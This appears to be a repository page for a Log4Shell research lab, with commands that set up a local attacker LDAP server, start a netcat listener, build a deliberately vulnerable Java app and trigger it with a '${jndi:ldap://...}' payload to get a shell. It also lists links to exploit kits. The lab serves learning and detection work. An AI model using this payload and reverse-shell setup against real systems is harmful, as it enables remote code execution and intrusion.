log4jshell-lab icon indicating copy to clipboard operation
log4jshell-lab copied to clipboard

Published 20 hours ago verified publisher icon Cyb3rWard0g

Metadata

Log4Shell Research Lab 🚧

A basic research lab to learn more about Log4Shell:

Used By

Research notes

  • I took the following notes while learning about Log4Shell. I hope they are helpful! 🍻.
  • Depending on which CVE you want to test, use the following research notes to simulate a few scenarios:
    • CVE-2021-44228 Simulation
    • CVE-2021-45046 Simulation

A Basic POC - CVE-2021-44228

Clone Repo

sudo su
git clone https://github.com/Cyb3rWard0g/log4jshell-lab

Install Docker

wget https://raw.githubusercontent.com/OTRF/Blacksmith/master/resources/scripts/bash/Install-Docker.sh
chmod +x Install-Docker.sh

./Install-Docker.sh

Run Docker Compose File

cd log4jshell-lab/attacker
docker-compose -f MarshalsecLDAP-NginxWebServer.yml up --build -d

Check Docker Containers

docker ps

docker logs --follow ldap-server
docker logs --follow web-server

Trigger CVE-2021-44228

This scenario simulates an attacker using the log4j CVE-2021-44228 RCE vulnerability to get a shell locally (127.0.0.1) via netcat. We are going to execute everything on the same endpoint where we deployed our attacker's infrastructure.

Start Netcat Server

nc -lvnp 443

Compile Vulnerable Java Application

Docker

cd log4jshell-lab/victim/vuln-apps/others/basicJar

docker run -it --rm -v "$(pwd)":/opt/maven -w /opt/maven maven mvn clean install

Manually

cd log4jshell-lab/victim/vuln-apps/others/basicJar
mvn -f pom.xml clean package -DskipTests

Run Application

java -cp target/Log4jLabProject-1.0-SNAPSHOT-all.jar com.log4jshell.App '${jndi:ldap://127.0.0.1:1389/Run}'

Security Datasets

References

  • https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE-wp.pdf
  • https://www.youtube.com/watch?v=Y8a5nB-vy78
  • https://github.com/veracode-research/rogue-jndi
  • https://community.microfocus.com/cyberres/fortify/f/fortify-discussions/317555/the-perils-of-java-deserialization
  • https://www.veracode.com/blog/research/exploiting-jndi-injections-java
  • https://github.com/pimps/JNDI-Exploit-Kit
  • https://github.com/pimps/ysoserial-modified
  • https://ldap.com/ldap-urls/
  • https://github.com/pwntester/SerialKillerBypassGadgetCollection
  • https://www.ibm.com/docs/en/content-manager/8.5.0?topic=ldap-server-configuration-storing-java-objects
  • https://docs.microsoft.com/en-us/windows/win32/ad/enabling-schema-changes-at-the-schema-master
  • https://forensicitguy.github.io/analyzing-log4shell-muhstik/
  • https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/fromCharCode
  • https://www.jackson-t.ca/runtime-exec-payloads.html
  • https://github.com/woodpecker-appstore/log4j-payload-generator/tree/master

Metadata

66
Stars
14
Forks
Watchers

Owner

verified publisher icon Cyb3rWard0g

Metadata

Back